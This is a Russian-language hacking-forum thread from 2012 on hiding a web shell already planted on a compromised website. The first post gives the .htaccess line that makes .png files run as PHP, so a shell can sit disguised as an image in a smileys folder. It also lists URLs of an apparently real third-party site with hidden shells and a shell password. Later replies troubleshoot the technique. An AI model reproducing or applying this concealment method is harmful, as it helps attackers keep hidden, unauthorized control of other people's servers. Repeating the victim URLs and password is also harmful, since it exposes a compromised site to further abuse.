Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

Прячем шелл

-

Базы серверов и брут

- Все, что связано с брутом и работой с базами данных

Ответ
 
Опции темы
Старый 26.09.2012, 17:47   #1
 Рыцарь-капитан
Аватар для ~Nero~
 
~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания
Регистрация: 17.02.2010
Сообщений: 550
Популярность: 2278
Золото Zhyk.Ru: 35
Сказал(а) спасибо: 1,110
Поблагодарили 915 раз(а) в 329 сообщениях
Отправить сообщение для ~Nero~ с помощью ICQ
 
По умолчанию Прячем шелл

В этой теме я не буду рассказывать как залить шелл на сайт, сейчас пойдет речь о том, как спрятать уже залитый шелл.

Блуждая по просторам рунета, я увидел, как некто "Shumaher777" прячет свои шеллы. И, скажу честно, мне понравился его подход.

Так вот, приведу пример уже спрятанного шелла:
Код:
_http://www.unitedmanagementinc.com/.smileys/smiley17.png
Первое что приходит в голову: "Not Found. Лол, шелл уже мертв"
Но не тут то было, если хорошенько присмотреться...



...то можно найти поле ввода пароля, для входа на шелл.

Теперь о практике:

На каждом сайте есть директории с картинками/смайлами и т.д. Ищем такую директорию и создаем там файл ".htaccess" Записываем в него вот такую строку:
Код:
AddType application/x-httpd-php .png
И сохраняем.
Далее заливаем наш шелл в формате .png или .jpg
[Ссылки могут видеть только зарегистрированные пользователи. ]
Ну и в принципе все готово.
Переходим по ссылке - видим "Not Found", но мы то знаем, что там шелл.
Точно такой же пример с .php шеллом:
Код:
_http://www.unitedmanagementinc.com/DBset.php
P.s. pswd - pro123
Надеюсь, смысл понятен.
Спасибо Shumaher777 за идею.

~nero~ для жук.ру
________________

[Ссылки могут видеть только зарегистрированные пользователи. ]

Халявные 50 рублей!
  Ответить с цитированием
5 пользователя(ей) сказали cпасибо:
666Death666 (26.09.2012), bonn (27.09.2012), Могучий (29.09.2012), love2 (26.09.2012), timon3993 (26.09.2012)
Старый 26.09.2012, 23:53   #2
 Пехотинец
Аватар для love2
 
love2 излучает ауруlove2 излучает ауруlove2 излучает ауруlove2 излучает ауруlove2 излучает ауруlove2 излучает ауру
Регистрация: 14.01.2010
Сообщений: 80
Популярность: 689
Сказал(а) спасибо: 222
Поблагодарили 215 раз(а) в 105 сообщениях
 
По умолчанию Re: Прячем шелл

Извеняюсь за флуд.
Есть пару вопросов, не раз сталкивался с такой проблеммой, а т.е. каждый раз)
Вот я создал файл .htaccess вбил туда AddType application/x-httpd-php .png
Скачал шелл , smiley17.png .
Далее даже создал папку на фтп ( .smileys )
Скопировал файлы .htaccess и smiley17.png
Перехожу по ссылке : [Ссылки могут видеть только зарегистрированные пользователи. ]
Мне выдает следущее : [Ссылки могут видеть только зарегистрированные пользователи. ]
Т.е. показывает нечитаемое изображение и Not Found даже нету.
Из-за чего возникает данная ситуация?
  Ответить с цитированием
Старый 27.09.2012, 15:51   #3
 Рыцарь-капитан
Аватар для ~Nero~
 
~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания~Nero~ блестящий пример для подражания
Регистрация: 17.02.2010
Сообщений: 550
Популярность: 2278
Золото Zhyk.Ru: 35
Сказал(а) спасибо: 1,110
Поблагодарили 915 раз(а) в 329 сообщениях
Отправить сообщение для ~Nero~ с помощью ICQ
 
По умолчанию Re: Прячем шелл

Не обрабатывается .htaccess
Правь файл httpd.conf
________________

[Ссылки могут видеть только зарегистрированные пользователи. ]

Халявные 50 рублей!
  Ответить с цитированием
Пользователь сказал cпасибо:
love2 (27.09.2012)
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Шелл Lykash Общение и обсуждение, архив Lineage 2 1 17.01.2011 12:19

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 10:10.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net